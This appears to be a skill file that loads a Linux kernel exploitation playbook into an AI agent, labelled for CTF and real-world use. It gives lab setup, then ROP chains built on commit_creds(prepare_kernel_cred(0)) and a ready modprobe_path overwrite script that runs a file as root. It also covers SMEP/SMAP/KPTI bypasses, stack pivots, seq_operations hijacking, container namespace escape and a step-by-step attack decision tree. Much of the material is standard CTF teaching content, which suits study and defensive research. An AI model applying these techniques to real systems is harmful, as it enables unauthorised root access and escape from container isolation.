--- name: kernel-exploitation description: >- Linux kernel exploitation playbook. Use when exploiting kernel vulnerabilities (UAF, OOB, race condition, type confusion) for privilege escalation via commit_creds, modprobe_path overwrite, or kernel ROP chains in CTF and real-world scenarios. --- # SKILL: Linux Kernel Exploitation — Expert Attack Playbook > **AI LOAD INSTRUCTION**: Expert kernel exploitation techniques. Covers environment setup (QEMU), vulnerability classes, privilege escalation targets, kernel ROP, ret2usr, stack pivoting, and cross-cache attacks. Distilled from ctf-wiki kernel-mode sections and real-world kernel CVEs. Base models often confuse user-mode and kernel-mode exploitation constraints, especially regarding SMEP/SMAP/KPTI. ## 0. RELATED ROUTING - [binary-protection-bypass](../binary-protection-bypass/SKILL.md) — userspace protections (NX, ASLR) also apply in kernel context - [stack-overflow-and-rop](../stack-overflow-and-rop/SKILL.md) — kernel ROP reuses many userspace ROP concepts - [heap-exploitation](../heap-exploitation/SKILL.md) — kernel SLUB is conceptually related to userspace heap - [linux-privilege-escalation](../linux-privilege-escalation/SKILL.md) — non-exploit kernel privesc techniques ### Advanced References - [KERNEL_MITIGATION_BYPASS.md](./KERNEL_MITIGATION_BYPASS.md) — KASLR, SMEP, SMAP, KPTI, FG-KASLR, CFI bypass techniques - [KERNEL_HEAP_TECHNIQUES.md](./KERNEL_HEAP_TECHNIQUES.md) — SLUB internals, cross-cache attacks, msg_msg/pipe_buffer/sk_buff exploitation --- ## 1. EXPLOITATION MODEL ``` ┌─────────────────────────────────────────────────────┐ │ 1. Find Vulnerability │ │ (UAF, OOB, race, integer overflow, type confusion)│ ├─────────────────────────────────────────────────────┤ │ 2. Build Primitive │ │ (arbitrary read, arbitrary write, controlled RIP)│ ├─────────────────────────────────────────────────────┤ │ 3. Bypass Mitigations │ │ (KASLR, SMEP, SMAP, KPTI) │ ├─────────────────────────────────────────────────────┤ │ 4. Escalate Privileges │ │ (commit_creds, modprobe_path, namespace escape) │ ├─────────────────────────────────────────────────────┤ │ 5. Return to Userspace Cleanly │ │ (KPTI trampoline, iretq/sysretq, swapgs) │ └─────────────────────────────────────────────────────┘ ``` --- ## 2. ENVIRONMENT SETUP ### QEMU + Custom Kernel ```bash # Download and compile kernel wget https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.1.tar.xz tar xf linux-6.1.tar.xz && cd linux-6.1 make defconfig # Disable mitigations for easier debugging: scripts/config --disable RANDOMIZE_BASE # KASLR scripts/config --disable RANDOMIZE_LAYOUT # FG-KASLR scripts/config --enable DEBUG_INFO make -j$(nproc) # Boot with QEMU qemu-system-x86_64 \ -kernel bzImage \ -initrd rootfs.cpio.gz \ -append "console=ttyS0 nokaslr quiet" \ -nographic \ -s -S \ # GDB server on :1234, pause at start -monitor /dev/null \ -m 256M \ -cpu kvm64,+smep,+smap ``` ### GDB Debugging ```bash gdb vmlinux target remote :1234 # Load kernel symbols add-symbol-file vmlinux 0xffffffff81000000 # typical .text base # Breakpoints b commit_creds b *0xffffffff81234567 # pwndbg/GEF work with kernel debugging ``` ### initramfs Modification ```bash mkdir rootfs && cd rootfs cpio -idmv < ../rootfs.cpio.gz # Edit init script, add exploit binary cp /path/to/exploit ./ # Repack find . | cpio -o --format=newc | gzip > ../rootfs.cpio.gz ``` --- ## 3. COMMON VULNERABILITY TYPES | Type | Description | Kernel Example | |---|---|---| | UAF | Object freed but pointer still accessible | CVE-2022-0847 (DirtyPipe) | | OOB Read/Write | Array index or size check missing | CVE-2021-22555 (Netfilter) | | Race Condition | TOCTOU between check and use | CVE-2016-5195 (DirtyCow) | | Integer Overflow | Size calculation wraps around | Various ioctl handlers | | Type Confusion | Object cast to wrong type | CVE-2023-0179 (Netfilter) | | Double Free | Object freed twice | SLUB allocator exploitation | | Stack Overflow | Kernel stack buffer overflow | Rare (kernel stack is small: 8KB–16KB) | --- ## 4. PRIVILEGE ESCALATION TARGETS ### Method 1: commit_creds(prepare_kernel_cred(0)) ```c // Kernel function that sets current process credentials to root void (*commit_creds)(void *) = COMMIT_CREDS_ADDR; void *(*prepare_kernel_cred)(void *) = PREPARE_KERNEL_CRED_ADDR; commit_creds(prepare_kernel_cred(0)); // cred with uid=0, gid=0 ``` Kernel ROP chain equivalent: ``` pop rdi; ret 0 # NULL → prepare_kernel_cred(NULL) = init_cred prepare_kernel_cred addr mov rdi, rax; ... ; ret # or pop rdi + known location commit_creds addr kpti_trampoline / swapgs+iretq # return to userspace ``` ### Method 2: modprobe_path Overwrite ```c // modprobe_path = "/sbin/modprobe" in kernel .data // Overwrite to "/tmp/x" → trigger with unknown binary format → kernel runs /tmp/x as root ``` ```bash # Setup: echo '#!/bin/sh' > /tmp/x echo 'cp /flag /tmp/flag && chmod 777 /tmp/flag' >> /tmp/x chmod +x /tmp/x # Trigger (unknown binary format): echo -ne '\xff\xff\xff\xff' > /tmp/dummy chmod +x /tmp/dummy /tmp/dummy # kernel calls modprobe_path → /tmp/x runs as root ``` ### Method 3: cred Structure Direct Overwrite If you can find the current task's `cred` pointer and have arbitrary write, directly zero out uid/gid fields in the cred structure. ### Method 4: Namespace Escape (Containers) Overwrite `init_nsproxy` or manipulate namespace pointers to escape container isolation. --- ## 5. KERNEL ROP ### Controlled RIP Sources | Source | Mechanism | |---|---| | Corrupted function pointer | UAF object has vtable-like dispatch → overwrite pointer | | Corrupted return address | Kernel stack overflow (rare) | | Corrupted `ops` structure | Module operations struct (file_operations, seq_operations) | ### seq_operations Hijack (Common CTF Pattern) ```c struct seq_operations { void * (*start)(struct seq_file *, loff_t *); void (*stop)(struct seq_file *, void *); void * (*next)(struct seq_file *, void *, loff_t *); int (*show)(struct seq_file *, void *); }; // Size: 0x20 (fits in kmalloc-32) // Open /proc/self/stat → allocates seq_operations // UAF overwrite start → controlled RIP when read() is called ``` ### Stack Pivoting in Kernel | Gadget | Usage | |---|---| | `xchg eax, esp; ret` | Pivot to address in lower 32 bits of RAX (mmap buffer at known addr) | | `mov rsp, [rdi+X]; ...` | If RDI points to controlled data | | `push rdi; pop rsp; ...` | Pivot to RDI (first arg of hijacked function) | **Important**: After SMEP, cannot execute userspace code. ROP chain must use **kernel gadgets** only. --- ## 6. ret2usr (Pre-SMEP) Directly call a userspace function from kernel context: ```c void escalate() { commit_creds(prepare_kernel_cred(0)); } // Overwrite kernel function pointer to point to escalate() in user memory ``` **Blocked by**: SMEP (Supervisor Mode Execution Prevention) — kernel cannot execute user-mapped pages. --- ## 7. RETURNING TO USERSPACE After privilege escalation in kernel, must return cleanly to userspace to get a root shell. ### Via iretq (Traditional) ```nasm ; ROP chain ending: swapgs ; swap GS base back to userspace iretq ; pops: RIP, CS, RFLAGS, RSP, SS from stack ; Stack must contain: [user_rip][user_cs][user_rflags][user_rsp][user_ss] ``` ```python # Save userspace state before entering kernel user_cs = 0x33 user_ss = 0x2b user_rflags = # saved via pushfq before exploit user_rsp = # saved RSP user_rip = # address of post-exploit function (e.g., get_shell) ``` ### Via KPTI Trampoline (When KPTI Enabled) KPTI separates kernel/user page tables. Direct `swapgs; iretq` crashes because user pages aren't mapped. Use the kernel's own return trampoline: ``` # KPTI trampoline (in kernel at known offset): # swapgs_restore_regs_and_return_to_usermode: # mov rdi, rsp # ... # swapgs # iretq # Jump to trampoline with [RIP, CS, RFLAGS, RSP, SS] on stack ``` ### Via signal Handler Return Set up a signal handler before exploit. After `commit_creds`, trigger the signal → return to userspace via signal handler (avoids manual swapgs/iretq). --- ## 8. QEMU DEBUGGING TIPS | Command | Purpose | |---|---| | `-s -S` | GDB server on :1234, paused | | `-monitor /dev/null` | Disable QEMU monitor (cleaner output) | | `-append "nokaslr"` | Disable KASLR for debugging | | `-cpu kvm64,+smep,+smap` | Enable specific CPU features | | `info registers` (GDB) | Show all register values | | `maintenance packet Qqemu.PhyMemMode:1` | Read physical memory in GDB | | `cat /proc/kallsyms` | Kernel symbol addresses (if readable) | | `cat /sys/kernel/notes` | Kernel build ID | --- ## 9. DECISION TREE ``` Kernel vulnerability identified ├── What type? │ ├── UAF → identify freed object, spray replacement (see KERNEL_HEAP_TECHNIQUES) │ ├── OOB → determine read/write range, target adjacent objects │ ├── Race condition → reliable trigger (userfaultfd, FUSE) │ ├── Integer overflow → how does it translate to OOB or allocation confusion? │ └── Type confusion → what can the confused type access? │ ├── Build primitive │ ├── Controlled RIP? → kernel ROP or ret2usr (if no SMEP) │ ├── Arbitrary read? → leak KASLR base, then controlled RIP │ ├── Arbitrary write? → modprobe_path overwrite (simplest) │ │ or overwrite cred structure directly │ └── Limited write? → target function pointer in known object │ ├── Mitigations (see KERNEL_MITIGATION_BYPASS.md) │ ├── KASLR → need info leak first (/proc/kallsyms if readable, timing, or OOB read) │ ├── SMEP → kernel ROP only (no user code exec) │ ├── SMAP → cannot read user data from kernel (use copy_from_user gadget) │ ├── KPTI → use KPTI trampoline for clean return │ └── FG-KASLR → function offsets randomized (use data section targets like modprobe_path) │ ├── Escalation method │ ├── Have controlled RIP + KASLR bypass → ROP chain: prepare_kernel_cred(0) → commit_creds │ ├── Have arbitrary write only → modprobe_path overwrite │ ├── Have arbitrary write + KASLR bypass → overwrite cred uid/gid to 0 │ └── Have controlled function call → call commit_creds(prepare_kernel_cred(0)) │ └── Return to userspace ├── KPTI disabled → swapgs; iretq (ROP ending) ├── KPTI enabled → jump to KPTI trampoline └── Alternative → signal handler + process_one_work return path ```